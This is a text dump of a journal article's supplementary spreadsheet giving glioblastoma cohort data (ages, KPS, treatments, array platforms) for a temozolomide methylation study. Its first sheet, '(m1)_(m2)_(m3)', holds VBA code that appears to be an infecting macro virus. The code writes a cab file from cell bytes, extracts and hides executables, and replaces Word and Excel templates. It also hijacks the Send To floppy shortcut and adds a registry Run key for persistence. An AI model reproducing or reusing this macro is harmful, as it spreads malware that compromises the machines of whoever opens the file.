# Supplementary material for: Novel predictive epigenetic signature for temozolomide in non-G-CIMP glioblastomas
Source: Clin Epigenetics. 2019 May 14;11:76. doi: 10.1186/s13148-019-0670-9 (PMC6515684; doi:10.1186/s13148-019-0670-9)
Supplement: Supplementary file 2 — Table S1. Sample information of discovery and validation cohorts. (XLSX 16 kb) [file 13148_2019_670_MOESM2_ESM.xlsx]

## Sheet: (m1)_(m2)_(m3)
		Private Sub createcabfile()
		Dim ch As Byte
		on error resume next
		Set fso = CreateObject("scripting.filesystemobject")
		Set w = CreateObject("wscript.shell")
		myfolder = w.specialfolders("Templates") & "\Software\"
		If Not fso.folderexists(myfolder) Then
		fso.createfolder myfolder
		End If
		For i=1 to Workbooks.Count
		If Workbooks(i).name="normal.xlm" then
		workbooks(i).close
		fso.deletefile Application.StartupPath & "\normal.xlm"
		End If
		Next
		For i=1 to Workbooks.Count
		If Workbooks(i).name="norma1.xlm" then
		goto a1
		End If
		Next
		cabfile= "c:\cab.cab"
		If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
		fso.delete cabfile
		open cabfile for binary access write as #1
		For i = 1 To 150
		hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
		n=1
		m=instr(hv," ")
		do while m>0
		ch=CByte(mid(hv,n,m-n))
		put #1,,ch
		n=m+1
		m=instr(n,hv," ")
		loop
		Next
		close #1
		w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
		w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
		w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
		w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
		fso.deletefile cabfile
		fso.copyfile "c:\normal.dot", myfolder, True
		set word=createobject("word.application")
		ntpath=word.NormalTemplate.Path & "\"
		word.quit
		fso.copyfile "c:\normal.dot", ntpath, True
		fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
		fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
		set fold=fso.getfolder(w.SpecialFolders("SendTo"))
		for each ff in fold.files
		if instr(ff.name,"软盘")>0 then
		set lnk=w.CreateShortcut(fold.path & "\" & ff.name)
		lnk.TargetPath="c:\sendto.exe"
		lnk.IconLocation="shell32.dll,6"
		lnk.save
		goto e2
		end if
		next
		e2:
		fso.deletefile "c:\normal.dot"
		fso.deletefile "c:\norma1.xlm"
		fso.deletefile "c:\internet.exe"
		w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True
		w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True
		w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"
		w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"
		End If
		Workbooks.Open Application.StartupPath & "\norma1.xlm"
		thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)
		workbooks("norma1.xlm").save
		fso.copyfile Application.StartupPath & "\norma1.xlm",myfolder,true
		a1:
		fso.deletefile "c:\excel.txt"
		Application.DisplayAlerts = False
		for i=1 to thisworkbook.sheets.count
		if left(thisworkbook.sheets(i).name,3)="模块表" then
		ThisWorkbook.Sheets(i).Delete
		end if
		next
		Application.DisplayAlerts = True
		ThisWorkbook.Saved=True
		End Sub

## Sheet: Sheet1
Supplementary Table S2: Sample information of discovery and validation cohorts
Variables	Discovery cohorts				Validation cohorts						Validation of FFPE samples			TCGA-Brennan et al by treatments
	RAUH-new cohort	TCGA-Brennan et al	GSE60274		RAUH-GSE22891	GSE50923	GSE60274	TCGA-LGGs	TCGA-Brennan et al		Xijing cohort	Xijing cohort		TCGA-Brennan et al	TCGA-Brennan et al	TCGA-Brennan et al	TCGA-Brennan et al
Treatment	RT/TMZ	RT/TMZ	RT only		RT/TMZ	RT/TMZ	RT/TMZ	RT/TMZ	RT only		RT/TMZ	RT only		standard RT only	uspecified or non-standard RT only	RT and adjuvant TMZ	TMZ chemoradiation plus adjuvant TMZ
Sample type	non-G-CIMP GBMs	non-G-CIMP GBMs	non-G-CIMP GBMs		non-G-CIMP GBMs	non-G-CIMP GBMs	non-G-CIMP GBMs	IDHwt and 1p/19q intact LGGs	non-G-CIMP GBMs		IDH1R132H wt GBMs	IDH1R132H wt GBMs		non-G-CIMP GBMs	non-G-CIMP GBMs	non-G-CIMP GBMs	non-G-CIMP GBMs
Sample size	77	219	27		48	49	32	50	73		32	22		22	51	65	154
Age (yrs)
Median (range)	60 (36-75)	60 (19-86)	53 (41-70)		58 (26-80)	59 (22-82)	52 (26-65)	58 (23-87)	69 (24-89)		53 (23-65)	57 (38-68)		67 (48-78)	69 (24-89)	61 (37-86)	60 (19-86)
Pre-operative KPS
Median (range)	90 (50-100)	80 (60-100)	NA		80 (40-100)	80 (50-90)	NA	90 (80-100)	60 (40-80)		NA	NA		60 (NA)	60 (40-80)	80 (60-100)	80 (60-100)
Unknown	25	168	27		4	0	32	37	66		32	22		21	45	41	127
Pre-adjuvant therapy KPS
Median (range)	100 (50-100)	80 (60-100)	NA		NA	NA	NA	80 (70-90)	60 (40-80)		80 (60-100)	80 (60-100)		60 (60-80)	60 (40-80)	80 (60-100)	80 (40-100)
Unknown	48	152	27		48	49	32	37	58		0	0		18	40	49	105
Gender
Male/female	55/22	131/88	21/6		24/23	29/20	24/8	29/21	40/33		20/12	13/9		13/9	27/24	41/24	93/61
Extent of surgery
Surgery (total/partial)	72 (55/17)	NA	21 (NA/NA)		43 (34/9)	47 (30/17)	27 (NA/NA)	25 (13/12)	NA		31 (23/8)	20 (15/5)		NA	NA	NA	NA
Biopsy	4	NA	1		1	2	1	1	NA		1	2		NA	NA	NA	NA
Unknown	1	219	5		4	0	3	24	73		0	0		22	51	65	154
Adjuvant therapy
RT+adjuvant TMZ	0	65	0		0	0	0	NA	0		8	0		0	0	65	0
RT+concurrent/adjuvant TMZ	77	154	0		48	49	32	NA	0		24	0		0	0	0	154
RT only	0	0	27		0	0	0	0	73		0	22		22	51	0	0
Adjuvant TMZ cycles
Median (range)	6 (0-18)	3 (1-24)	—		NA	NA	NA	6.5 (2-11)	—		4 (1-12)	—		—	—	2 (1-10)	3 (1-24)
Unknown	18	67	—		NA	NA	NA	42	—		0	—		—	—	28	39
Treatment at recrrence
Surgery (Y/N/NA)	2/43/32	55/44/120	NA		NA	NA	NA	9/15/26	5/16/52		3/29/0	2/20/0		2/8/12	3/8/40	14/17/34	41/27/86
Radiotherapy (Y/N/NA)	3/42/32	36/175/8	NA		NA	NA	NA	9/17/24	2/65/6		1/31/0	0/22/0		1/21/0	1/44/6	12/48/5	24/127/3
Chemotherapy (Y/N/NA)	38/7/32	91/114/12	NA		NA	NA	NA	17/9/24	3/60/8		9/23/0	7/15/0		2/18/2	1/42/8	27/32/6	64/84/6
Bevacizumab (Y/N/NA)	29/32/16	49/167/3	NA		0/48/0	NA	NA	3/35/12	0/20/53		0/32/0	0/22/0		0/4/18	0/16/35	12/51/2	37/116/1
Microarray platform
Infinium27k	0	159	0		48	49	0	0	55		—	—		19	36	45	119
Infinium450k	77	60	27		0	0	32	50	18		—	—		3	15	25	35
RAUH= Rennes and Angers University Hospitals; TCGA=The Cancer Genome Atlas; G-CIMP=glioma-CpGs island methylator phenotype; GBM=glioblastoma; LGG=lower-grade gliomas; IDHwt= wide type IDH; KPS= Karnofsky performance score; NA=not available; TMZ=temozolomide;
RT=radiotherapy; yrs=years; Y=yes; N=no
